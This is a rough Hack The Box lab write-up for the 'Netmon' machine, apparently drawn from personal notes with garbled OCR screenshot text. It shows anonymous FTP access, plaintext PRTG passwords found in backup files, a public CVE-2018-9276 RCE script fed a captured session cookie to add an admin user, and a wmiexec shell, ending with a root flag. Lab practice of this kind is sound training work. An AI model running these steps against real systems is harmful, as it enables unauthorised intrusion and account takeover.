Netmon – 10.10.10.152

Nmap scan:

First observation: ftp – anonymous login allowed

PRTG 18.1.37

Let’s try ftp anonymous login:

Machine generated alternative text: root@kali: O/Documents/HTB/Netmon-10.10.10.152105x48 ftp 10.10.10.152 connected to 10.10.10.152. 220 Microsoft FTP Service Name (10.10.10.152: root): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. password : 230 User logged in. Remote system type is Windows _ NT.

Basic shell – nice!

Let’s cd around

Holy shit that was easy!

Now onto root:

PRTG 18.1.37 -> known vulnerability ->

PRTG gave away some of your passwords. from sysadmin

https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data

So the app stored away some plaintext passwords in backup files.

Machine generated alternative text: Automatically generated temporary files that may exist: E: \PRTG\PRTG Configuration. old E: \PRTG\PRTG Configuration. nul

Let’s search them

Get 3 config files and look in all of them for plaintext passwords

Hint: put .txt behind it and open with leafpad

Search on password

.old.bak had this

Machine generated alternative text: PRTG Network Monitor (NETMON) Login Name Password Your login has failed. Please try again! Login

Failed…

Going through the forumsomeone said “what year are we in rn?”

Trying 2019…

Machine generated alternative text: @ 10.10.10.152 lwelcome.htm Libraries Sensors Alarms Maps Reports Welcome PRTG System Administrator!

Prtg 18.1.37 rce exploit

https://github.com/M4LV0/PRTG-Network-Monitor-RCE

Use burp to capture cookie

Machine generated alternative text: Burp Intruder Repeater Window Help Proxy _ Spider Scanner Intruder Target HTTP history WebSockets history interce t Request to http:no.10.10.152:80 Burp Suite Community Edition v1.7.36 - Temporary Project Decoder Comparer Extender Project options User options Repeater Options Sequencer Action Alerts Forward Drop Intercept is on Commer Raw Pa rams Headers Hex GET 'welcome.htm HTTP/I.I Host: 10.10.10.152 user-Agent: mozi11a/5.o (Xll; Linux 1686; rv:6e.0) Geck0/20100101 Firefox/60.e Accept: text/html, application/xhtml•xml, Accept -Language: en-US, q=e.5 Accept -Encoding: gzip, deflate Referer: http://lO.10.10.152/pubIic/login. cookie: _ga-=GA1.4.1647149010.1555166354: _gid-GA1.4.1405493387.1555439550; OCTOPUS1813713946-eZVCNZIXNkVBLTIFOkOtND14hS05MTC2LmzuzhFOkJDWYZ030%3Dl Connection: close Upgrade -Insecure -Requests: 1

Feed it to exploit

Machine generated alternative text: _gid=GA1.4.1405493387. o. 1555166354; FQkJDNUYZQ30%3D" PRTG RCE script by M4LVO [ https://github.com/M4LVO ./prtg-exploit.sh -u http://10.10.10.152 -c " ga=GA1.4. 16471490: 1555439550; OCTOPUS1813713946=eZVCNZIXNkVBLTIFQkQtND14MS05MTC2LTMZNzt Authenticated PRTG network Monitor remote code execution CVE-2018-9276 [ # login to the app, default creds are prtgadmin/PrTg@dmin2019. once athenticated grab your cookie and acic it to the script. run the script to create a new user •pentest' in the administrators group with password 'P3nT3St! ' file created sending notification wait. adding a new user ' pentest' with password 'P3nT3St' sending notification wait. adding a user pentest to the administrators group sending notification wait.. . exploit completed new user ' pentest' with password root@kali : /opt/PRTG-Network-Monitor-RCE# Activate Windows ' P3nT3st ! ' Go-eatSettin9* ttaativate Windows.

Now we created a user. Time to connect to it.

https://github.com/SecureAuthCorp/impacket

Machine generated alternative text: python wmiexec . py pentest@10.10.10.152 Impacket vo.9.20-dev - copyright 2019 secureAuth corporation Password: SMBv3.O dialect used [!] Launching semi-interactive [!] Press help for extra shell netmonxøentest shell - Careful what you execute commands Activate

Got root shell!!!

Root flag check

3018977fb944bf1878f75b879fba67cc –> root flag is password want box is nog active (verwijder deze regel maar in write up)